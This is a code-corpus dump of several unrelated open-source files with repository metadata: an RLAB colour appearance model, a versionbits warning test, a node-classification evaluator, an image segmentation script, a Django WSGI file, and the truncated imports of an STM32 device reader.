colour/appearance/rlab.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | 1
|
2022-02-12T06:28:15.000Z
|
2022-02-12T06:28:15.000Z
|
colour/appearance/rlab.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
colour/appearance/rlab.py
|
soma2000-lang/colour
|
bb7ee23ac65e09613af78bd18dd98dffb1a2904a
|
[
"BSD-3-Clause"
] | null | null | null |
"""
RLAB Colour Appearance Model
============================
Defines the *RLAB* colour appearance model objects:
- :attr:`colour.VIEWING_CONDITIONS_RLAB`
- :attr:`colour.D_FACTOR_RLAB`
- :class:`colour.CAM_Specification_RLAB`
- :func:`colour.XYZ_to_RLAB`
References
----------
- :cite:`Fairchild1996a` : Fairchild, M. D. (1996). Refinement of the RLAB
color space. Color Research & Application, 21(5), 338-346.
doi:10.1002/(SICI)1520-6378(199610)21:5<338::AID-COL3>3.0.CO;2-Z
- :cite:`Fairchild2013w` : Fairchild, M. D. (2013). The RLAB Model. In Color
Appearance Models (3rd ed., pp. 5563-5824). Wiley. ISBN:B00DAYO8E2
"""
from __future__ import annotations
import numpy as np
from dataclasses import dataclass, field
from colour.algebra import matrix_dot, spow, vector_dot
from colour.appearance.hunt import MATRIX_XYZ_TO_HPE, XYZ_to_rgb
from colour.hints import (
ArrayLike,
FloatingOrArrayLike,
FloatingOrNDArray,
NDArray,
Optional,
)
from colour.utilities import (
CaseInsensitiveMapping,
MixinDataclassArray,
as_float,
as_float_array,
from_range_degrees,
row_as_diagonal,
to_domain_100,
tsplit,
)
__author__ = "Colour Developers"
__copyright__ = "Copyright (C) 2013-2022 - Colour Developers"
__license__ = "New BSD License - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"MATRIX_R",
"VIEWING_CONDITIONS_RLAB",
"D_FACTOR_RLAB",
"CAM_ReferenceSpecification_RLAB",
"CAM_Specification_RLAB",
"XYZ_to_RLAB",
]
MATRIX_R: NDArray = np.array(
[
[1.9569, -1.1882, 0.2313],
[0.3612, 0.6388, 0.0000],
[0.0000, 0.0000, 1.0000],
]
)
"""
*RLAB* colour appearance model precomputed helper matrix.
"""
VIEWING_CONDITIONS_RLAB: CaseInsensitiveMapping = CaseInsensitiveMapping(
{"Average": 1 / 2.3, "Dim": 1 / 2.9, "Dark": 1 / 3.5}
)
VIEWING_CONDITIONS_RLAB.__doc__ = """
Reference *RLAB* colour appearance model viewing conditions.
References
----------
:cite:`Fairchild1996a`, :cite:`Fairchild2013w`
"""
D_FACTOR_RLAB: CaseInsensitiveMapping = CaseInsensitiveMapping(
{
"Hard Copy Images": 1,
"Soft Copy Images": 0,
"Projected Transparencies, Dark Room": 0.5,
}
)
D_FACTOR_RLAB.__doc__ = """
*RLAB* colour appearance model *Discounting-the-Illuminant* factor values.
References
----------
:cite:`Fairchild1996a`, :cite:`Fairchild2013w`
Aliases:
- 'hard_cp_img': 'Hard Copy Images'
- 'soft_cp_img': 'Soft Copy Images'
- 'projected_dark': 'Projected Transparencies, Dark Room'
"""
D_FACTOR_RLAB["hard_cp_img"] = D_FACTOR_RLAB["Hard Copy Images"]
D_FACTOR_RLAB["soft_cp_img"] = D_FACTOR_RLAB["Soft Copy Images"]
D_FACTOR_RLAB["projected_dark"] = D_FACTOR_RLAB[
"Projected Transparencies, Dark Room"
]
@dataclass
class CAM_ReferenceSpecification_RLAB(MixinDataclassArray):
"""
Defines the *RLAB* colour appearance model reference specification.
This specification has field names consistent with *Fairchild (2013)*
reference.
Parameters
----------
LR
Correlate of *Lightness* :math:`L^R`.
CR
Correlate of *achromatic chroma* :math:`C^R`.
hR
*Hue* angle :math:`h^R` in degrees.
sR
Correlate of *saturation* :math:`s^R`.
HR
*Hue* :math:`h` composition :math:`H^R`.
aR
Red-green chromatic response :math:`a^R`.
bR
Yellow-blue chromatic response :math:`b^R`.
References
----------
:cite:`Fairchild1996a`, :cite:`Fairchild2013w`
"""
LR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
CR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
hR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
sR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
HR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
aR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
bR: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
@dataclass
class CAM_Specification_RLAB(MixinDataclassArray):
"""
Defines the *RLAB* colour appearance model specification.
This specification has field names consistent with the remaining colour
appearance models in :mod:`colour.appearance` but diverge from
*Fairchild (2013)* reference.
Parameters
----------
J
Correlate of *Lightness* :math:`L^R`.
C
Correlate of *achromatic chroma* :math:`C^R`.
h
*Hue* angle :math:`h^R` in degrees.
s
Correlate of *saturation* :math:`s^R`.
HC
*Hue* :math:`h` composition :math:`H^C`.
a
Red-green chromatic response :math:`a^R`.
b
Yellow-blue chromatic response :math:`b^R`.
Notes
-----
- This specification is the one used in the current model implementation.
References
----------
:cite:`Fairchild1996a`, :cite:`Fairchild2013w`
"""
J: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
C: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
h: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
s: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
HC: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
a: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
b: Optional[FloatingOrNDArray] = field(default_factory=lambda: None)
def XYZ_to_RLAB(
XYZ: ArrayLike,
XYZ_n: ArrayLike,
Y_n: FloatingOrArrayLike,
sigma: FloatingOrArrayLike = VIEWING_CONDITIONS_RLAB["Average"],
D: FloatingOrArrayLike = D_FACTOR_RLAB["Hard Copy Images"],
) -> CAM_Specification_RLAB:
"""
Computes the *RLAB* model color appearance correlates.
Parameters
----------
XYZ
*CIE XYZ* tristimulus values of test sample / stimulus.
XYZ_n
*CIE XYZ* tristimulus values of reference white.
Y_n
Absolute adapting luminance in :math:`cd/m^2`.
sigma
Relative luminance of the surround, see
:attr:`colour.VIEWING_CONDITIONS_RLAB` for reference.
D
*Discounting-the-Illuminant* factor normalised to domain [0, 1].
Returns
-------
CAM_Specification_RLAB
*RLAB* colour appearance model specification.
Notes
-----
+------------+-----------------------+---------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``XYZ`` | [0, 100] | [0, 1] |
+------------+-----------------------+---------------+
| ``XYZ_n`` | [0, 100] | [0, 1] |
+------------+-----------------------+---------------+
+------------------------------+-----------------------\
+---------------+
| **Range** | **Scale - Reference** \
| **Scale - 1** |
+==============================+=======================\
+===============+
| ``CAM_Specification_RLAB.h`` | [0, 360] \
| [0, 1] |
+------------------------------+-----------------------\
+---------------+
References
----------
:cite:`Fairchild1996a`, :cite:`Fairchild2013w`
Examples
--------
>>> XYZ = np.array([19.01, 20.00, 21.78])
>>> XYZ_n = np.array([109.85, 100, 35.58])
>>> Y_n = 31.83
>>> sigma = VIEWING_CONDITIONS_RLAB['Average']
>>> D = D_FACTOR_RLAB['Hard Copy Images']
>>> XYZ_to_RLAB(XYZ, XYZ_n, Y_n, sigma, D) # doctest: +ELLIPSIS
CAM_Specification_RLAB(J=49.8347069..., C=54.8700585..., \
h=286.4860208..., s=1.1010410..., HC=None, a=15.5711021..., \
b=-52.6142956...)
"""
XYZ = to_domain_100(XYZ)
XYZ_n = to_domain_100(XYZ_n)
Y_n = as_float_array(Y_n)
D = as_float_array(D)
sigma = as_float_array(sigma)
# Converting to cone responses.
LMS_n = XYZ_to_rgb(XYZ_n)
# Computing the :math:`A` matrix.
LMS_l_E = (3 * LMS_n) / np.sum(LMS_n, axis=-1)[..., np.newaxis]
LMS_p_L = (1 + spow(Y_n[..., np.newaxis], 1 / 3) + LMS_l_E) / (
1 + spow(Y_n[..., np.newaxis], 1 / 3) + (1 / LMS_l_E)
)
LMS_a_L = (LMS_p_L + D[..., np.newaxis] * (1 - LMS_p_L)) / LMS_n
M = matrix_dot(
matrix_dot(MATRIX_R, row_as_diagonal(LMS_a_L)), MATRIX_XYZ_TO_HPE
)
XYZ_ref = vector_dot(M, XYZ)
X_ref, Y_ref, Z_ref = tsplit(XYZ_ref)
# Computing the correlate of *Lightness* :math:`L^R`.
LR = 100 * spow(Y_ref, sigma)
# Computing opponent colour dimensions :math:`a^R` and :math:`b^R`.
aR = as_float(430 * (spow(X_ref, sigma) - spow(Y_ref, sigma)))
bR = as_float(170 * (spow(Y_ref, sigma) - spow(Z_ref, sigma)))
# Computing the *hue* angle :math:`h^R`.
hR = np.degrees(np.arctan2(bR, aR)) % 360
# TODO: Implement hue composition computation.
# Computing the correlate of *chroma* :math:`C^R`.
CR = np.hypot(aR, bR)
# Computing the correlate of *saturation* :math:`s^R`.
sR = CR / LR
return CAM_Specification_RLAB(
LR,
CR,
as_float(from_range_degrees(hR)),
sR,
None,
aR,
bR,
)
| 29.938907
| 79
| 0.609816
|
4a10f85528fe06884133c6390cdcf87a46743687
| 5,082
|
py
|
Python
|
test/functional/feature_versionbits_warning.py
|
BakedInside/test
|
c411891206e72c0da9c9f7a69a2183703b71a988
|
[
"MIT"
] | null | null | null |
test/functional/feature_versionbits_warning.py
|
BakedInside/test
|
c411891206e72c0da9c9f7a69a2183703b71a988
|
[
"MIT"
] | null | null | null |
test/functional/feature_versionbits_warning.py
|
BakedInside/test
|
c411891206e72c0da9c9f7a69a2183703b71a988
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2016-2019 The Beans Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test version bits warning system.
Generate chains with block versions that appear to be signalling unknown
soft-forks, and test that warning alerts are generated.
"""
import os
import re
from test_framework.blocktools import create_block, create_coinbase
from test_framework.messages import msg_block
from test_framework.p2p import P2PInterface
from test_framework.test_framework import BeansTestFramework
VB_PERIOD = 144 # versionbits period length for regtest
VB_THRESHOLD = 108 # versionbits activation threshold for regtest
VB_TOP_BITS = 0x20000000
VB_UNKNOWN_BIT = 27 # Choose a bit unassigned to any deployment
VB_UNKNOWN_VERSION = VB_TOP_BITS | (1 << VB_UNKNOWN_BIT)
WARN_UNKNOWN_RULES_ACTIVE = "unknown new rules activated (versionbit {})".format(VB_UNKNOWN_BIT)
VB_PATTERN = re.compile("Warning: unknown new rules activated.*versionbit")
class VersionBitsWarningTest(BeansTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
self.alert_filename = os.path.join(self.options.tmpdir, "alert.txt")
# Open and close to create zero-length file
with open(self.alert_filename, 'w', encoding='utf8'):
pass
self.extra_args = [["-alertnotify=echo %s >> \"" + self.alert_filename + "\""]]
self.setup_nodes()
def send_blocks_with_version(self, peer, numblocks, version):
"""Send numblocks blocks to peer with version set"""
tip = self.nodes[0].getbestblockhash()
height = self.nodes[0].getblockcount()
block_time = self.nodes[0].getblockheader(tip)["time"] + 1
tip = int(tip, 16)
for _ in range(numblocks):
block = create_block(tip, create_coinbase(height + 1), block_time)
block.nVersion = version
block.solve()
peer.send_message(msg_block(block))
block_time += 1
height += 1
tip = block.sha256
peer.sync_with_ping()
def versionbits_in_alert_file(self):
"""Test that the versionbits warning has been written to the alert file."""
alert_text = open(self.alert_filename, 'r', encoding='utf8').read()
return VB_PATTERN.search(alert_text) is not None
def run_test(self):
node = self.nodes[0]
peer = node.add_p2p_connection(P2PInterface())
node_deterministic_address = node.get_deterministic_priv_key().address
# Mine one period worth of blocks
node.generatetoaddress(VB_PERIOD, node_deterministic_address)
self.log.info("Check that there is no warning if previous VB_BLOCKS have <VB_THRESHOLD blocks with unknown versionbits version.")
# Build one period of blocks with < VB_THRESHOLD blocks signaling some unknown bit
self.send_blocks_with_version(peer, VB_THRESHOLD - 1, VB_UNKNOWN_VERSION)
node.generatetoaddress(VB_PERIOD - VB_THRESHOLD + 1, node_deterministic_address)
# Check that we're not getting any versionbit-related errors in get*info()
assert not VB_PATTERN.match(node.getmininginfo()["warnings"])
assert not VB_PATTERN.match(node.getnetworkinfo()["warnings"])
# Build one period of blocks with VB_THRESHOLD blocks signaling some unknown bit
self.send_blocks_with_version(peer, VB_THRESHOLD, VB_UNKNOWN_VERSION)
node.generatetoaddress(VB_PERIOD - VB_THRESHOLD, node_deterministic_address)
self.log.info("Check that there is a warning if previous VB_BLOCKS have >=VB_THRESHOLD blocks with unknown versionbits version.")
# Mine a period worth of expected blocks so the generic block-version warning
# is cleared. This will move the versionbit state to ACTIVE.
node.generatetoaddress(VB_PERIOD, node_deterministic_address)
# Stop-start the node. This is required because beansd will only warn once about unknown versions or unknown rules activating.
self.restart_node(0)
# Generating one block guarantees that we'll get out of IBD
node.generatetoaddress(1, node_deterministic_address)
self.wait_until(lambda: not node.getblockchaininfo()['initialblockdownload'])
# Generating one more block will be enough to generate an error.
node.generatetoaddress(1, node_deterministic_address)
# Check that get*info() shows the versionbits unknown rules warning
assert WARN_UNKNOWN_RULES_ACTIVE in node.getmininginfo()["warnings"]
assert WARN_UNKNOWN_RULES_ACTIVE in node.getnetworkinfo()["warnings"]
# Check that the alert file shows the versionbits unknown rules warning
self.wait_until(lambda: self.versionbits_in_alert_file())
if __name__ == '__main__':
VersionBitsWarningTest().main()
| 47.495327
| 137
| 0.717631
|
4a10fb9bd780bb1c53eda563a2a601f528b75054
| 3,488
|
py
|
Python
|
gssl/inductive/tasks.py
|
pbielak/graph-barlow-twins
|
f8e20134afed4f17ffcecf8f48764df362ffdcad
|
[
"MIT"
] | 9
|
2021-06-11T13:23:50.000Z
|
2022-03-23T19:45:54.000Z
|
gssl/inductive/tasks.py
|
pbielak/graph-barlow-twins
|
f8e20134afed4f17ffcecf8f48764df362ffdcad
|
[
"MIT"
] | 2
|
2021-09-22T13:58:39.000Z
|
2021-11-23T02:26:50.000Z
|
gssl/inductive/tasks.py
|
pbielak/graph-barlow-twins
|
f8e20134afed4f17ffcecf8f48764df362ffdcad
|
[
"MIT"
] | 2
|
2021-06-10T06:05:47.000Z
|
2021-09-27T15:13:23.000Z
|
from typing import Dict
import numpy as np
from sklearn import metrics as sk_mtr
from sklearn import preprocessing as sk_prep
import torch
from torch import nn
from tqdm import tqdm
def evaluate_node_classification(
z_train: torch.Tensor,
y_train: torch.Tensor,
z_val: torch.Tensor,
y_val: torch.Tensor,
z_test: torch.Tensor,
y_test: torch.Tensor,
) -> Dict[str, float]:
# Normalize input
z_train = sk_prep.StandardScaler().fit_transform(X=z_train)
z_val = sk_prep.StandardScaler().fit_transform(X=z_val)
z_test = sk_prep.StandardScaler().fit_transform(X=z_test)
# Shapes
emb_dim = z_train.shape[1]
num_cls = y_train.size(1)
# Find best classifier for given `weight_decay` space
weight_decays = 2.0 ** np.arange(-10, 10, 2)
best_clf = None
best_f1 = -1
pbar = tqdm(weight_decays, desc="Train best classifier")
for wd in pbar:
lr_model = LogisticRegression(emb_dim, num_cls, weight_decay=wd)
lr_model.fit(z_train, y_train.numpy())
f1 = sk_mtr.f1_score(
y_true=y_val,
y_pred=lr_model.predict(z_val),
average="micro",
zero_division=0,
)
if f1 > best_f1:
best_f1 = f1
best_clf = lr_model
pbar.set_description(f"Best F1: {best_f1 * 100.0:.2f}")
pbar.close()
# Compute metrics over all splits
all_f1 = {
"train": sk_mtr.f1_score(
y_true=y_train,
y_pred=best_clf.predict(z_train),
average="micro",
zero_division=0,
),
"val": sk_mtr.f1_score(
y_true=y_val,
y_pred=best_clf.predict(z_val),
average="micro",
zero_division=0,
),
"test": sk_mtr.f1_score(
y_true=y_test,
y_pred=best_clf.predict(z_test),
average="micro",
zero_division=0,
),
}
return all_f1
class LogisticRegression(nn.Module):
def __init__(self, in_dim: int, out_dim: int, weight_decay: float):
super().__init__()
self.fc = nn.Linear(in_dim, out_dim)
self._optimizer = torch.optim.AdamW(
params=self.parameters(),
lr=0.01,
weight_decay=weight_decay,
)
self._loss_fn = nn.BCEWithLogitsLoss()
self._num_epochs = 1000
self._device = torch.device(
"cuda" if torch.cuda.is_available() else "cpu"
)
for m in self.modules():
self.weights_init(m)
self.to(self._device)
def weights_init(self, m):
if isinstance(m, nn.Linear):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
m.bias.data.fill_(0.0)
def forward(self, x):
return self.fc(x)
def fit(self, X: np.ndarray, y: np.ndarray):
self.train()
X = torch.from_numpy(X).float().to(self._device)
y = torch.from_numpy(y).to(self._device)
for _ in tqdm(range(self._num_epochs), desc="Epochs", leave=False):
self._optimizer.zero_grad()
pred = self(X)
loss = self._loss_fn(input=pred, target=y)
loss.backward()
self._optimizer.step()
def predict(self, X: np.ndarray):
self.eval()
with torch.no_grad():
pred = self(torch.from_numpy(X).float().to(self._device))
return (pred > 0).float().cpu()
| 26.029851
| 75
| 0.583716
|
4a10fbbcc5929e00e82a9a37d8fec907205a72a5
| 869
|
py
|
Python
|
src/segmentation/img/reconstruir.py
|
mmaximiliano/algo3-project2
|
bad8f7704f8d004c1e21ba684e98890578bf8ccc
|
[
"MIT"
] | null | null | null |
src/segmentation/img/reconstruir.py
|
mmaximiliano/algo3-project2
|
bad8f7704f8d004c1e21ba684e98890578bf8ccc
|
[
"MIT"
] | null | null | null |
src/segmentation/img/reconstruir.py
|
mmaximiliano/algo3-project2
|
bad8f7704f8d004c1e21ba684e98890578bf8ccc
|
[
"MIT"
] | null | null | null |
from PIL import Image
from PIL import ImageOps
import numpy as np
import random as rand
import os
ruta = input()
componentes = np.loadtxt(ruta+".txt", dtype=int)
height = componentes.shape[0]
width = componentes.shape[1]
exists = os.path.isfile('colores.txt')
if not exists:
print("Generando colores...")
f=open("colores.txt", "w")
for i in range(0, 1920):
for j in range(0,1920):
f.write(str(rand.randint(0,255))+", "+str(rand.randint(0,255))+", "+str(rand.randint(0,255))+", 255 \n")
colores = []
with open('colores.txt') as f:
colores = [tuple(map(int, i.split(','))) for i in f]
img = Image.new('RGB', componentes.shape)
segmentada = img.load()
for i in range(0,height):
for j in range(0, width):
segmentada[i,j]=colores[componentes[i,j]]
img = img.rotate(270, expand=True)
img = ImageOps.mirror(img)
img.save("resultados/"+ruta+"_seg.bmp")
| 23.486486
| 107
| 0.675489
|
4a10fc842770c44ebb6cd67b1f620920fc5e5308
| 12,372
|
py
|
Python
|
pyblq/old/runtime.py
|
patrickrall/pyblq
|
593e678ff7ca5dc77ffcc1f0636ef41762c65e60
|
[
"MIT"
] | null | null | null |
pyblq/old/runtime.py
|
patrickrall/pyblq
|
593e678ff7ca5dc77ffcc1f0636ef41762c65e60
|
[
"MIT"
] | null | null | null |
pyblq/old/runtime.py
|
patrickrall/pyblq
|
593e678ff7ca5dc77ffcc1f0636ef41762c65e60
|
[
"MIT"
] | null | null | null |
from .qaasm import *
# returns qaasm_expn. Evaluates as much as possible.
# perhaps need to wrap the thing to keep track of dependent registers
# and also deal with arrays
# alternative: realize that a qaasm expn can only ever end up in a qaasm increment instruction.
# the wrapper could be a list of instructions itself.
# {"expn":<qaasm_expn>, "depends":[<reg>,<reg>,<reg>],
# "arrays":[{"target":<reg>, "key":<reg>, "regs":[<reg>,<reg>]}] }
# returns expn, depends, arrays
def process_qaasm_expn(ast):
if ast["kind"] == "symbol_expression":
name = ast["identifier"]["value"]
if name in kwargs:
assert complex(kwargs[name]) == kwargs[name]
return {"kind": "value_expn", "value": kwargs[name]}, [], []
assert name in scope
if ast["key"] is None:
assert isinstance(scope[name], Register)
return {"kind": "register_expn", "register":scope[name]}, [scope[name]], []
key, deps, arrs = process_qaasm_expn(ast["key"])
assert len(arrs) == 0
if key["kind"] == "value_expn":
assert len(deps) == 0
v = int(key["value"].real)
if v < 0 or v >= len(scope[name]):
raise IndexError("Array index '"+str(v)+"' out of range"+at(ast["loc"]))
return {"kind": "register_expn", "register":scope[name][v]}, [scope[name][v]], []
assert key["kind"] == "register_expn"
assert len(deps) == 1
assert deps[0] == key["register"]
keydim = key["register"].dim
if keydim >= len(scope[name]):
keyname = ast["key"]["identifier"]["value"]]
raise IndexError("Array index register '"+keyname+"' dimension "+str(keydim)+" out of range"+\
" for array '"+key+"' of length "+str(len(scope[name]))+error_at(ast["loc"],args))
dim = scope[name][0].dim
reg = Register(dim)
out = {"kind":"register_expn", "register":reg}
array = {"target": reg, "key": key["register"], "regs":[scope[name][i] for i in range(keydim)]}
return out, deps+array["regs"], [array]
if ast["kind"] == "scalar_expression":
return {"kind": "value_expn", "value": ast["value"]}, [], []
assert ast["kind"] != "block_expression"
assert ast["kind"] != "consume_expression"
assert ast["kind"] != "create_expression"
assert ast["kind"] != "adjoint_expression"
if ast["kind"] == "parenthetical_expression":
return process_qaasm_expn(ast["expn"])
if ast["kind"] == "negate_expression":
child, deps, arrs = process_qaasm_expn(ast["expn"])
if child["kind"] == "value_expn":
return {"kind": "value_expn", "value": -child["value"]}, [], []
return {"kind": "negate_expn", "expn": child }, deps, arrs
if ast["kind"] == "boolean_expression":
# {"kind": "boolean_expn", "terms":[<linexp>, <string>, <linexp>, <string>, ...] }
terms = []
out_deps = []
out_arrs = []
for i in range(len(ast["terms"])):
if i % 2 == 1:
assert ast["terms"][i] in ["==", "!=", "<", ">", ">=", "<="]
terms.append(ast["terms"][i])
else:
expn, deps, arrs = process_qaasm_expn(ast["terms"][i])
out_arrs += arrs
for dep in deps:
if dep not in out_deps:
out_deps.append(dep)
terms.append(expn)
# try to pre-evaluate entire expression
all_values_known = True
for i in range(len(ast["terms"])):
if i % 2 == 1:
if terms[i-1]["kind"] == "value_expn" and terms[i+1]["kind"] == "value_expn":
if terms[i] == "==": value = (terms[i-1]["value"] == terms[i+1]["value"])
elif terms[i] == "!=": value = (terms[i-1]["value"] != terms[i+1]["value"])
elif terms[i] == "<": value = (terms[i-1]["value"] < terms[i+1]["value"])
elif terms[i] == ">": value = (terms[i-1]["value"] > terms[i+1]["value"])
elif terms[i] == ">=": value = (terms[i-1]["value"] >= terms[i+1]["value"])
else:
assert terms[i] == "<="
value = (terms[i-1]["value"] <= terms[i+1]["value"])
if not value:
return {"kind": "value_expn", "value": complex(0)}, [], []
else:
all_values_known = False
if all_values_known:
return {"kind": "value_expn", "value": complex(1)}, [], []
return {"kind": "boolean_expn", "terms":terms }, out_deps, out_arrs
if ast["kind"] == "sum_expression":
scalar = None
terms = []
out_deps = []
out_arrs = []
for term in ast["terms"]:
value, deps, arrs = process_qaasm_expn(term)
out_arrs += arrs
for dep in deps:
if dep not in out_deps:
out_deps.append(dep)
if value["kind"] == "value_expn":
if scalar is None:
scalar = value["value"]
else:
scalar += value["value"]
else:
terms.append(value)
if len(terms) == 0:
return {"kind": "value_expn", "value": scalar}, [], []
if scalar is not None:
terms.append({"kind": "value_expn", "value": scalar})
return {"kind": "sum_expn", "terms":terms }, out_deps, out_arrs
assert ast["kind"] != "tensorproduct_expression"
if ast["kind"] == "product_expression":
scalar = None
terms = []
out_deps = []
out_arrs = []
for term in ast["terms"]:
value,deps,arrs = process_qaasm_expn(term)
out_arrs += arrs
for dep in deps:
if dep not in out_deps:
out_deps.append(dep)
if value["kind"] == "value_expn":
if scalar is None:
scalar = value["value"]
else:
scalar *= value["value"]
else:
terms.append(value)
if len(terms) == 0:
return {"kind": "value_expn", "value": scalar}, [], []
if scalar is not None:
terms.append({"kind": "value_expn", "value": scalar})
return {"kind": "product_expn", "terms":terms }, out_deps, out_arrs
if ast["kind"] == "division_expression":
dividend, deps, arrs = process_qaasm_expn(ast["dividend"])
divisor, _, _ = process_qaasm_expn(ast["divisor"])
assert divisor["kind"] == "value_expn"
if dividend["kind"] == "value_expn":
return {"kind": "value_expn", "value": dividend["value"]/divisor["value"]}, [], []
return {"kind":"division_expn", "dividend": dividend, "divisor":divisor["value"]}, deps, arrs
if ast["kind"] == "modulo_expression":
dividend, deps, arrs = process_qaasm_expn(ast["dividend"])
divisor, _, _ = process_qaasm_expn(ast["divisor"])
assert divisor["kind"] == "value_expn"
v = divisor["value"]
bad = (v.real != v)
if not bad: bad = int(v.real) != v
if not bad: bad = int(v.real) < 1
if v.real != v:
raise IndexError("Modulo divisor dimension "+str(v)+" must be a positive integer"+error_at(ast["loc"],args))
v = int(v.real)
if dividend["kind"] == "value_expn":
# Honestly, I don't know what generalization of modulo to complex numbers I should pick.
# There are some sensible candidates but none of them are obvious or standard.
# But I need a modulo operation, so I'm going with this simple thing for now - should be replaced later:
# Insist the divisor is a positive integer, and shift the real part of the dividend into the range [0,divisor).
# According to the wikipedia article on modulo, languages vary wildly in their implementation of this operation.
# Sadly the python implementation won't work for me because I need it to be well defined for any complex dividend.
out = dividend["value"]
while out.real < 0: out += v
while out.real >= v.real: out -= v
return {"kind": "value_expn", "value": out}, [], []
return {"kind":"modulo_expn", "dividend": dividend, "divisor":v}
if ast["kind"] == "exponent_expression":
base, out_deps, out_arrs = process_qaasm_expn(ast["base"])
exponent, deps, arrs = process_qaasm_expn(ast["exponent"])
out_arrs += arrs
for dep in deps:
if dep not in out_deps:
out_deps.append(dep)
if base["kind"] == "value_expn" and exponent["kind"] == "value_expn":
return {"kind": "value_expn", "value": base["value"] ** exponent["value"]}, [], []
return {"kind":"exponent_expn", "base": base, "divisor": exponent}, out_deps, out_arrs
assert ast["kind"] != "tensorexponent_expression"
assert False # should be unreachable
########################################################################
def build_block(out,in_decls,out_decls,instrs,args,kwargs):
scope = {}
for decl in in_decls:
# TODO: correct?
scope[name] = Register(in_decls["dim"])
#################
# returns Blq
def process_block_expn(ast,scope):
if ast["kind"] == "symbol_expression":
if name in kwargs:
assert isinstance(kwargs[name], blq)
# don't need to copy, since all other evaluations copy
return kwargs[name]
assert name in scope
expn, deps, arrs = process_qaasm_expn(ast)
assert expn["kind"] == "register_expn"
assert len(arrs) in [0,1]
out = Blq()
out.scale = expn["register"].dim
if len(arrs) == 1:
arr = qaasm_array_idx(b,arrs[0])
arr.__enter__()
for i in range(expn["register"].dim):
tmp = Blq()
qaasm_postselect
if len(arrs) == 1:
arr.__exit__()
return
if ast["kind"] == "scalar_expression":
return
if ast["kind"] == "block_expression":
return
if ast["kind"] == "consume_expression":
return
if ast["kind"] == "create_expression":
return
if ast["kind"] == "adjoint_expression":
return
if ast["kind"] == "parenthetical_expression":
return
if ast["kind"] == "negate_expression":
return
if ast["kind"] == "boolean_expression":
return
if ast["kind"] == "sum_expression":
return
if ast["kind"] == "tensorproduct_expression":
return
if ast["kind"] == "product_expression":
return
if ast["kind"] == "division_expression":
return
if ast["kind"] == "modulo_expression":
return
if ast["kind"] == "exponent_expression":
return
if ast["kind"] == "tensorexponent_expression":
return
assert False # should be unreachable
def process_instruction(ast):
if ast["kind"] == "declare_instruction":
return
if ast["kind"] == "discard_instruction":
return
if ast["kind"] == "uncompute_instruction":
return
if ast["kind"] == "scalar_instruction":
return
if ast["kind"] == "pass_instruction":
return
if ast["kind"] == "repeat_instruction":
return
if ast["kind"] == "if_instruction":
return
if ast["kind"] == "init_instruction":
return
if ast["kind"] == "assign_instruction":
return
if ast["kind"] == "increment_instruction":
return
if ast["kind"] == "decrement_instruction":
return
assert False # should be unreachable
#################
for instr in instrs:
process_instruction(instr)
# package up outQaasm somehow?
return out
| 33.258065
| 126
| 0.518348
|
4a10fdbc853a9040e70bdc2bb76df5065156f0f8
| 393
|
py
|
Python
|
bookshub/wsgi.py
|
jefferson2z/books-hub
|
9587deecec6b37305492874e2124578b75e6c5a2
|
[
"MIT"
] | null | null | null |
bookshub/wsgi.py
|
jefferson2z/books-hub
|
9587deecec6b37305492874e2124578b75e6c5a2
|
[
"MIT"
] | null | null | null |
bookshub/wsgi.py
|
jefferson2z/books-hub
|
9587deecec6b37305492874e2124578b75e6c5a2
|
[
"MIT"
] | 1
|
2021-12-23T21:15:40.000Z
|
2021-12-23T21:15:40.000Z
|
"""
WSGI config for bookshub project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'bookshub.settings')
application = get_wsgi_application()
| 23.117647
| 78
| 0.78626
|
4a10fe32f7f5f8a7b817f3a0647d664bf06ad3fd
| 17,379
|
py
|
Python
|
tools/device_file_generator/dfg/stm32/stm_reader.py
|
roboterclubaachen/xpcc
|
010924901947381d20e83b838502880eb2ffea72
|
[
"BSD-3-Clause"
] | 161
|
2015-01-13T15:52:06.000Z
|
2020-02-13T01:26:04.000Z
|
tools/device_file_generator/dfg/stm32/stm_reader.py
|
salkinium/xpcc
|
010924901947381d20e83b838502880eb2ffea72
|
[
"BSD-3-Clause"
] | 281
|
2015-01-06T12:46:40.000Z
|
2019-01-06T13:06:57.000Z
|
tools/device_file_generator/dfg/stm32/stm_reader.py
|
salkinium/xpcc
|
010924901947381d20e83b838502880eb2ffea72
|
[
"BSD-3-Clause"
] | 51
|
2015-03-03T19:56:12.000Z
|
2020-03-22T02:13:36.000Z
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013, Roboterclub Aachen e.V.
# All rights reserved.
#
# The file is part of the xpcc library and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
import os
import re
from lxml import etree
from logger import Logger
from device_identifier import DeviceIdentifier
from ..reader import XMLDeviceReader
import stm
from .stm import stm32f1_remaps
from .stm import stm32_memory
